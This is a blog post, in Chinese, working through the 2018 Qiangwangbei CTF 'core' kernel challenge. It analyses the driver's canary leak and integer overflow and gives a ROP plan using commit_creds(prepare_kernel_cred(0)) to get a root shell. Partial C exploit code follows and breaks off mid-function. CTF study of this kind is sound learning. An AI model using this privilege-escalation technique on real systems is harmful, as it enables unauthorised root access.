<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="linux kernel pwn,">










<meta name="description" content="0x00 前言放假+摸鱼。。。。 0x01 题目基本信息题目解压出来有4个文件：bzImage、core.cpio、start.sh、vmlinux。bzImage是镜像文件core.cpio：这是一个打包后的文件，里面包含文件系统，其中vmlinux文件是内核的二进制文件，相当于pwn题中的libc。start.sh：是启动脚本。修改start.sh文件中的64M为128M。 12345678q">
<meta name="keywords" content="linux kernel pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="2018 强网杯 CORE writeup 学习笔记">
<meta property="og:url" content="https://v1ckydxp.github.io/archives/2019/08/27/2019-08-27-2018-强网杯-core/index.html">
<meta property="og:site_name" content="v1cky&#39;blog">
<meta property="og:description" content="0x00 前言放假+摸鱼。。。。 0x01 题目基本信息题目解压出来有4个文件：bzImage、core.cpio、start.sh、vmlinux。bzImage是镜像文件core.cpio：这是一个打包后的文件，里面包含文件系统，其中vmlinux文件是内核的二进制文件，相当于pwn题中的libc。start.sh：是启动脚本。修改start.sh文件中的64M为128M。 12345678q">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://v1ckydxp.github.io/images/15668899244579.jpg">
<meta property="og:image" content="https://v1ckydxp.github.io/images/15668899460404.jpg">
<meta property="og:image" content="https://v1ckydxp.github.io/images/15668899548232.jpg">
<meta property="og:image" content="https://v1ckydxp.github.io/images/15668899663908.jpg">
<meta property="og:image" content="https://v1ckydxp.github.io/images/15668899779360.jpg">
<meta property="og:image" content="https://v1ckydxp.github.io/images/15668905170158.jpg">
<meta property="og:image" content="https://v1ckydxp.github.io/images/15668906455435.jpg">
<meta property="og:image" content="https://v1ckydxp.github.io/images/15668908041755.jpg">
<meta property="og:image" content="https://v1ckydxp.github.io/images/15668911170888.jpg">
<meta property="og:updated_time" content="2019-08-29T06:29:40.378Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2018 强网杯 CORE writeup 学习笔记">
<meta name="twitter:description" content="0x00 前言放假+摸鱼。。。。 0x01 题目基本信息题目解压出来有4个文件：bzImage、core.cpio、start.sh、vmlinux。bzImage是镜像文件core.cpio：这是一个打包后的文件，里面包含文件系统，其中vmlinux文件是内核的二进制文件，相当于pwn题中的libc。start.sh：是启动脚本。修改start.sh文件中的64M为128M。 12345678q">
<meta name="twitter:image" content="https://v1ckydxp.github.io/images/15668899244579.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://v1ckydxp.github.io/archives/2019/08/27/2019-08-27-2018-强网杯-core/">





  <title>2018 强网杯 CORE writeup 学习笔记 | v1cky'blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">v1cky'blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">few words,many deeds!</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://v1ckydxp.github.io/archives/2019/08/27/2019-08-27-2018-强网杯-core/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="v1cky01dxp">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="v1cky'blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">2018 强网杯 CORE writeup 学习笔记</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-08-27T00:00:00+08:00">
                2019-08-27
              </time>
            

            
              <span class="post-meta-divider">|</span>
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-check-o"></i>
              </span>
              
                <span class="post-meta-item-text">Post modified&#58;</span>
              
              <time title="Post modified" itemprop="dateModified" datetime="2019-08-29T14:29:40+08:00">
                2019-08-29
              </time>
            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/linux-kernel/" itemprop="url" rel="index">
                    <span itemprop="name">linux-kernel</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>
            <span class="busuanzi-value" id="busuanzi_value_page_pv"></span>
            </span>
          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  1.8k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Reading time &asymp;</span>
                
                <span title="Reading time">
                  8
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>放假+摸鱼。。。。</p>
<h2 id="0x01-题目基本信息"><a href="#0x01-题目基本信息" class="headerlink" title="0x01 题目基本信息"></a>0x01 题目基本信息</h2><p>题目解压出来有4个文件：bzImage、core.cpio、start.sh、vmlinux。<br>bzImage是镜像文件<br>core.cpio：这是一个打包后的文件，里面包含文件系统，其中vmlinux文件是内核的二进制文件，相当于pwn题中的libc。<br>start.sh：是启动脚本。<br>修改start.sh文件中的64M为128M。</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">qemu-system-x86_64 \</span><br><span class="line">-m 128M \</span><br><span class="line">-kernel ./bzImage \</span><br><span class="line">-initrd  ./core.cpio \</span><br><span class="line">-append <span class="string">"root=/dev/ram rw console=ttyS0 oops=panic panic=1 quiet kaslr"</span> \</span><br><span class="line">-s  \</span><br><span class="line">-netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \</span><br><span class="line">-nographic  \</span><br></pre></td></tr></table></figure>
<p>可以看到开启了kaslr保护。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">```</span><br><span class="line">解压core.cpio。</span><br><span class="line"></span><br><span class="line">```sh</span><br><span class="line">$ mkdir core</span><br><span class="line">$ cd core</span><br><span class="line">$ mv ../core.cpio core.cpio.gz</span><br><span class="line">$ gunzip ./core.cpio.gz</span><br><span class="line">$ cpio -idmv &lt; ./core.cpio</span><br></pre></td></tr></table></figure></p>
<p>可以看到有如下这些文件：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bin  core.ko  etc  gen_cpio.sh  init  lib  lib64  linuxrc  proc  root  sbin  sys  tmp  usr  vmlinux</span><br></pre></td></tr></table></figure>
<p>修改init文件的内容如下，方便后面调试：<br><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/sh</span></span><br><span class="line">mount -t proc proc /proc</span><br><span class="line">mount -t sysfs sysfs /sys</span><br><span class="line">mount -t devtmpfs none /dev</span><br><span class="line">/sbin/mdev -s</span><br><span class="line">mkdir -p /dev/pts</span><br><span class="line">mount -vt devpts -o gid=4,mode=620 none /dev/pts</span><br><span class="line">chmod 666 /dev/ptmx</span><br><span class="line">cat /proc/kallsyms &gt; /tmp/kallsyms </span><br><span class="line"><span class="built_in">echo</span> 1 &gt; /proc/sys/kernel/kptr_restrict</span><br><span class="line"><span class="built_in">echo</span> 1 &gt; /proc/sys/kernel/dmesg_restrict</span><br><span class="line">ifconfig eth0 up</span><br><span class="line">udhcpc -i eth0</span><br><span class="line">ifconfig eth0 10.0.2.15 netmask 255.255.255.0</span><br><span class="line">route add default gw 10.0.2.2</span><br><span class="line">insmod /core.ko</span><br><span class="line"><span class="comment"># setsid /bin/cttyhack setuidgid 1000 /bin/sh</span></span><br><span class="line">setsid /bin/cttyhack setuidgid 0 /bin/sh</span><br><span class="line"><span class="comment">#setsid /bin/cttyhack setuidgid 1000 /bin/sh</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">'sh end!\n'</span></span><br><span class="line">umount /proc</span><br><span class="line">umount /sys</span><br><span class="line"></span><br><span class="line">poweroff -d 0  -f</span><br></pre></td></tr></table></figure></p>
<p><code>cat /proc/kallsyms &gt; /tmp/kallsyms</code> 这句，将kallsyms拷贝了一份在/tmp目录下，可以在这里查找commit_creds和prepare_kernel_cred的地址。运行打包脚本gen_cpio.sh ，重新打包。<br>core.ko就是漏洞存在的驱动程序，查看文件基本信息：</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">[*] <span class="string">'/media/psf/pwn/linux-kernel/2018-core/give_to_player/core/core.ko'</span></span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    No RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x0)</span><br></pre></td></tr></table></figure>
<p>只开启了canary保护。</p>
<h2 id="0x02-漏洞分析"><a href="#0x02-漏洞分析" class="headerlink" title="0x02 漏洞分析"></a>0x02 漏洞分析</h2><p>将core.ko丢进ida查看逻辑。</p>
<h3 id="查看init-module函数和fop结构体"><a href="#查看init-module函数和fop结构体" class="headerlink" title="查看init_module函数和fop结构体"></a>查看init_module函数和fop结构体</h3><p><img src="/images/15668899244579.jpg" alt="-w1029"><br>可以看到驱动文件创建在proc目录下的core文件。<br><img src="/images/15668899460404.jpg" alt="-w982"><br><img src="/images/15668899548232.jpg" alt="-w968"><br><img src="/images/15668899663908.jpg" alt="-w992"><br><img src="/images/15668899779360.jpg" alt="-w992"><br>可以看到fop结构体中只实现了core_wirte、core_ioctl、core_release三个回调函数。core_read、core_copy_func但是这俩是驱动内部的函数，是不能由用户程序来调用的。</p>
<h3 id="core-ioctl"><a href="#core-ioctl" class="headerlink" title="core_ioctl"></a>core_ioctl</h3><p>函数根据传进去的参数，分别进行不同的操作。当参数为0x6677889C时，可以对off变量进行操作。<br><img src="/images/15668905170158.jpg" alt="-w1028"></p>
<h3 id="core-read"><a href="#core-read" class="headerlink" title="core_read"></a>core_read</h3><p>read函数将栈上偏移off处的数据读取到用户态变量中，由上面可知，off变量可以控制，就是可以将栈上任意偏移处的数据读取到用户态变量中，程序开启了canary保护，这里可以泄漏canary值。<br><img src="/images/15668906455435.jpg" alt="-w1019"></p>
<h3 id="core-copy-func"><a href="#core-copy-func" class="headerlink" title="core_copy_func"></a>core_copy_func</h3><p>参数a1传进来的是signed int，但是在进行拷贝的时候将其转换成了unsigned int，这里存在整数溢出，若a1传进来为负数，转换后会是一个很大的数，会导致溢出。<br><img src="/images/15668908041755.jpg" alt="-w1026"></p>
<h3 id="core-write"><a href="#core-write" class="headerlink" title="core_write"></a>core_write</h3><p>core_write函数会设置name值，name在bss段，rop可以从这里传入，先保存到bss段中，然后core_copy_func函数将其拷贝到内核栈上。<br><img src="/images/15668911170888.jpg" alt="-w1030"></p>
<h2 id="0x03-漏洞利用"><a href="#0x03-漏洞利用" class="headerlink" title="0x03 漏洞利用"></a>0x03 漏洞利用</h2><p>漏洞利用思路：</p>
<blockquote>
<ol>
<li>设置off值，泄漏canary。</li>
<li>通过write函数往全局变量name写rop_chain。</li>
<li>通过core_copy_func函数将保存在全局变量中的rop_chain拷贝到内核栈上。</li>
<li>通过rop执行commit_creds(prepare_kernel_cred(0))提权</li>
<li>返回到用户态，getshell。</li>
</ol>
</blockquote>
<h3 id="获取commit-creds、prapare-kernel-cred函数地址"><a href="#获取commit-creds、prapare-kernel-cred函数地址" class="headerlink" title="获取commit_creds、prapare_kernel_cred函数地址"></a>获取commit_creds、prapare_kernel_cred函数地址</h3><ol>
<li>可以通过读取/tmp/kallsyms文件直接获取。<blockquote>
<p>grep commit_creds /tmp/kallsyms和grep prepare_kernel_cred /tmp/kallsyms</p>
</blockquote>
</li>
<li>由于commit_creds、prapare_kernel_cred函数在vmlinux中的偏移固定，可以得到加载后的vmlinux基地址，减去commit_creds、prapare_kernel_cred函数在vmlinux文件中的偏移来得到。<br>首先获取两函数在vmlinux文件中的固定偏移：</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">elf = ELF(<span class="string">'./vmlinux'</span>)</span><br><span class="line">commit_creds = hex(elf.symbols[<span class="string">'commit_creds'</span>]<span class="number">-0xffffffff81000000</span>)</span><br><span class="line">prapare_kernel_cred = hex(elf.symbols[<span class="string">'prepare_kernel_cred'</span>]<span class="number">-0xffffffff81000000</span>)</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt;&gt; from pwn import *</span><br><span class="line">&gt;&gt;&gt; elf = ELF(&apos;./vmlinux&apos;)</span><br><span class="line">[*] &apos;/media/psf/pwn/linux-kernel/2018-core/give_to_player/core/vmlinux&apos;</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    No RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX disabled</span><br><span class="line">    PIE:      No PIE (0xffffffff81000000)</span><br><span class="line">    RWX:      Has RWX segments</span><br><span class="line">&gt;&gt;&gt; commit_creds = hex(elf.symbols[&apos;commit_creds&apos;]-0xffffffff81000000)</span><br><span class="line">&gt;&gt;&gt; prapare_kernel_cred = hex(elf.symbols[&apos;prepare_kernel_cred&apos;]-0xffffffff81000000)</span><br><span class="line">&gt;&gt;&gt; print commit_creds</span><br><span class="line">0x9c8e0</span><br></pre></td></tr></table></figure>
<p>启动qemu，在qemu中查看/proc/kallsyms中的 commit_creds 函数地址</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/ <span class="comment"># cat  /proc/kallsyms | grep commit_creds</span></span><br><span class="line">ffffffffa909c8e0 T commit_creds</span><br></pre></td></tr></table></figure>
<p>得到vmlinux基地址 = 0xffffffffa909c8e0 - 0x9c8e0 = 0xffffffffa9000000。</p>
<h3 id="获取gadget"><a href="#获取gadget" class="headerlink" title="获取gadget"></a>获取gadget</h3><p>可以在gadget中查找，ctf-wiki上面说了两种方法，我用的ROPgadget，只能说慢的感人。</p>
<figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ ROPgadget --binary vmlinux &gt; gadget.txt</span><br></pre></td></tr></table></figure>
<h3 id="保存用户环境"><a href="#保存用户环境" class="headerlink" title="保存用户环境"></a>保存用户环境</h3><p>在进入内核态之前要进行的操作：swapgs、交换栈顶、push保存各种寄存器的值。<br>这是push保存各寄存器时最重要的几个操作。<br><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">pushq  $__USER_DS      <span class="comment">/* pt_regs-&gt;ss */</span></span><br><span class="line"><span class="function">pushq  <span class="title">PER_CPU_VAR</span><span class="params">(rsp_scratch)</span>  <span class="comment">/* pt_regs-&gt;sp */</span></span></span><br><span class="line">pushq  %r11             /* pt_regs-&gt;flags */</span><br><span class="line">pushq  $__USER_CS      <span class="comment">/* pt_regs-&gt;cs */</span></span><br><span class="line">pushq  %rcx             <span class="comment">/* pt_regs-&gt;ip */</span></span><br></pre></td></tr></table></figure></p>
<p>这几个操作是恢复用户态时需要关注的5个寄存器，而且顺序是固定的。这部分可以用一个专门的函数实现，预先将这5个寄存器变量值保存到用户变量里，然后在playload中按照顺序部署。</p>
<h3 id="ROP链构造"><a href="#ROP链构造" class="headerlink" title="ROP链构造"></a>ROP链构造</h3><blockquote>
<ol>
<li>控制程序流执行<strong>commit_creds(prepare_kernel_cred(0))</strong></li>
<li>执行<strong>swapgs；iretq</strong>，回到用户态。</li>
</ol>
</blockquote>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//exp参考ctf-wiki</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;pthread.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/ioctl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/wait.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">setoff</span><span class="params">(<span class="keyword">int</span> fd,<span class="keyword">long</span> <span class="keyword">long</span> offset)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    ioctl(fd,<span class="number">0x6677889C</span>,offset);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">core_read</span><span class="params">(<span class="keyword">int</span> fd,<span class="keyword">char</span> * usr_buf)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    ioctl(fd,<span class="number">0x6677889B</span>,usr_buf);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">core_copy_func</span><span class="params">(<span class="keyword">int</span> fd,<span class="keyword">long</span> <span class="keyword">long</span> len)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    ioctl(fd,<span class="number">0x6677889A</span>,len);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">getshell</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    system(<span class="string">"/bin/sh"</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//保存用户状态</span></span><br><span class="line"><span class="keyword">size_t</span> user_cs,user_ss,user_rflags,user_sp;</span><br><span class="line"><span class="function"><span class="keyword">void</span>  <span class="title">save_status</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    __asm__(<span class="string">"mov user_cs,cs;"</span></span><br><span class="line">	    <span class="string">"mov user_ss,ss;"</span></span><br><span class="line">	    <span class="string">"mov user_sp,rsp;"</span></span><br><span class="line">	    <span class="string">"pushf;"</span></span><br><span class="line">	    <span class="string">"pop user_rflags;"</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">//获取commit_creds函数和prepare_kernel_cred函数的地址</span></span><br><span class="line"><span class="keyword">size_t</span> commit_creds = <span class="number">0</span>,prepare_kernel_cred = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">size_t</span> raw_vmlinux_base = <span class="number">0xffffffff81000000</span>; <span class="comment">//未加载时的vmlinux文件的基地址</span></span><br><span class="line"><span class="keyword">size_t</span> vmlinux_base = <span class="number">0</span>; <span class="comment">//加载后的vmlinux基地址 </span></span><br><span class="line"></span><br><span class="line"><span class="keyword">size_t</span> findSyms()</span><br><span class="line">&#123;</span><br><span class="line">    FILE* kallsyms_fd = fopen(<span class="string">"/tmp/kallsyms"</span>,<span class="string">"r"</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(kallsyms_fd &lt; <span class="number">0</span>)</span><br><span class="line">	<span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">    <span class="comment">///tmp # cat kallsyms | grep commit_cred</span></span><br><span class="line">    <span class="comment">//ffffffff9ca9c8e0 T commit_creds</span></span><br><span class="line">    </span><br><span class="line">    <span class="keyword">char</span> tmp[<span class="number">0x30</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span>(fgets(tmp,<span class="number">0x30</span>,kallsyms_fd))</span><br><span class="line">    &#123;</span><br><span class="line">	<span class="keyword">if</span>(commit_creds &amp; prepare_kernel_cred)</span><br><span class="line">	    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">	<span class="keyword">if</span>(<span class="built_in">strstr</span>(tmp,<span class="string">"commit_creds"</span>) &amp;&amp; !commit_creds)<span class="comment">//在读取中的字符串中查找子串</span></span><br><span class="line">	&#123;</span><br><span class="line">	    <span class="keyword">char</span> hex[<span class="number">20</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line">	    <span class="built_in">strncpy</span>(hex,tmp,<span class="number">16</span>);<span 